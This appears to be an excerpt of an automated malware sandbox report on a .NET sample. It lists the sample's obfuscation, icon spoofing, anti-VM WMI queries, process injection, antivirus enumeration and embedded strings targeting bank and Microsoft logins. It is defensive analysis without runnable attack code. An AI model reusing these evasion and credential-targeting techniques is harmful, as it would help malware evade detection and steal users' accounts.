Source: 0.2.UzQWEAhf9B.exe.4179b18.1.raw.unpack, icddYlCgBCTaRZdds7.cs	High entropy of concatenated method names: 'DuCSk75LVd', 'r0ZSFtsZJe', 'QV2SHQP1ws', 'F0vS4d3j9T', 'Un9Soi3lgT', 'LGkSegmaSN', 's2pSvsCk8I', 'PRpSM74FFL', 'b3tSnhHO73', 'et7SElQoyF'
Source: 0.2.UzQWEAhf9B.exe.4179b18.1.raw.unpack, Pmj5QPs4hPDHULbXm1.cs	High entropy of concatenated method names: 'G9fWjRC0Eo', 'uy1WpsBk15', 'TPuWIcOfad', 'lSxWyZY7VQ', 'F2bWR6KOex', 'MMaWL8oMZa', 'Haf8RTcOIZ2rqNwN2d', 'JsqCUFIa8qmbm1kVBV', 'brUWWZNsmQ', 'jYhW76Tof0'
Source: 0.2.UzQWEAhf9B.exe.4179b18.1.raw.unpack, kfJYwZixqRGJ0mnhc1.cs	High entropy of concatenated method names: 'u3EG1ovsga', 'syvGQFJmjN', 'P1RG0JOZ58', 'HdfG3lHjWD', 'HV1G5B5qlC', 'YUEGjhHTcC', 's8eGp30xw4', 'htBGbnqF5w', 'QLgGIonAm7', 'UXQGyD9pmL'
Source: 0.2.UzQWEAhf9B.exe.4179b18.1.raw.unpack, v7VQnYZ1ZbVkAZ2b6K.cs	High entropy of concatenated method names: 'WHw3mIAdZs', 'dWU3uAJBNY', 'UCi0dXoo71', 'GyQ0oV2sNp', 'nHb0eF3LPA', 'bYy0l7ppDR', 'mdI0vai11k', 'WHP0MUBYMf', 'p8L0whWbbk', 'ECg0nelgMr'
Source: 0.2.UzQWEAhf9B.exe.4179b18.1.raw.unpack, Tdd4ecvu2YPG0uOu1f.cs	High entropy of concatenated method names: 'OrPj13M5Vs', 'Ifrj0qOayU', 'kMGj5xUxxK', 'Hap5cpMCvK', 'F6y5ztU7qA', 'RXHjP08R7n', 'OwijWKG0vi', 'IlRjDn6FR5', 't1sj7eVC2b', 'c1qjsOgmAo'
Source: 0.2.UzQWEAhf9B.exe.4179b18.1.raw.unpack, ako8slQanmdon2FZ0T.cs	High entropy of concatenated method names: 'Dispose', 'hRLW9AowQb', 'aRjD4lHKGA', 'B9DcclF0nl', 'dpfWcJYwZx', 'BRGWzJ0mnh', 'ProcessDialogKey', 'Y1MDPd7pC3', 'FWEDWXQsmV', 'pLWDDAbHct'

Hooking and other Techniques for Hiding and Protection

Icon mismatch, binary includes an icon from a different legit application in order to fool users

Source: initial sample

Icon embedded in binary file: icon matches a legit application icon: download (29).png

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 55615
Source: unknown	Network traffic detected: HTTP traffic on port 55615 -> 49707

Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: UzQWEAhf9B.exe PID: 5908, type: MEMORYSTR

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Users\user\Desktop\UzQWEAhf9B.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\UzQWEAhf9B.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Memory allocated: 1510000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Memory allocated: 2EE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Memory allocated: 2CE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Memory allocated: 6160000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Memory allocated: 7160000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Memory allocated: 7390000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Memory allocated: 8390000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Memory allocated: 2C90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Memory allocated: 2EA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Memory allocated: 2CD0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Window / User API: threadDelayed 1159			Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Window / User API: threadDelayed 6621			Jump to behavior

Source: C:\Users\user\Desktop\UzQWEAhf9B.exe TID: 3812	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe TID: 3748	Thread sleep time: -22136092888451448s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe TID: 1520	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe TID: 3480	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\UzQWEAhf9B.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: tmp90C0.tmp.4.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: tmp90C0.tmp.4.dr	Binary or memory string: discord.comVMware20,11696428655f
Source: tmp90C0.tmp.4.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: tmp90C0.tmp.4.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: tmp90C0.tmp.4.dr	Binary or memory string: global block list test formVMware20,11696428655
Source: tmp90C0.tmp.4.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: tmp90C0.tmp.4.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: tmp90C0.tmp.4.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: tmp90C0.tmp.4.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: tmp90C0.tmp.4.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: tmp90C0.tmp.4.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: tmp90C0.tmp.4.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: tmp90C0.tmp.4.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: tmp90C0.tmp.4.dr	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: tmp90C0.tmp.4.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: tmp90C0.tmp.4.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: tmp90C0.tmp.4.dr	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: tmp90C0.tmp.4.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: tmp90C0.tmp.4.dr	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: tmp90C0.tmp.4.dr	Binary or memory string: AMC password management pageVMware20,11696428655
Source: tmp90C0.tmp.4.dr	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: tmp90C0.tmp.4.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: tmp90C0.tmp.4.dr	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: tmp90C0.tmp.4.dr	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: tmp90C0.tmp.4.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: tmp90C0.tmp.4.dr	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: tmp90C0.tmp.4.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: UzQWEAhf9B.exe, 00000004.00000002.2167137233.0000000001181000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllt
Source: tmp90C0.tmp.4.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: tmp90C0.tmp.4.dr	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: tmp90C0.tmp.4.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: tmp90C0.tmp.4.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Users\user\Desktop\UzQWEAhf9B.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\UzQWEAhf9B.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\UzQWEAhf9B.exe

Memory written: C:\Users\user\Desktop\UzQWEAhf9B.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process created: C:\Users\user\Desktop\UzQWEAhf9B.exe "C:\Users\user\Desktop\UzQWEAhf9B.exe"	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process created: C:\Users\user\Desktop\UzQWEAhf9B.exe "C:\Users\user\Desktop\UzQWEAhf9B.exe"	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Process created: C:\Users\user\Desktop\UzQWEAhf9B.exe "C:\Users\user\Desktop\UzQWEAhf9B.exe"	Jump to behavior

Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Queries volume information: C:\Users\user\Desktop\UzQWEAhf9B.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Queries volume information: C:\Users\user\Desktop\UzQWEAhf9B.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\UzQWEAhf9B.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: UzQWEAhf9B.exe, 00000004.00000002.2183220195.00000000066D3000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\Desktop\UzQWEAhf9B.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
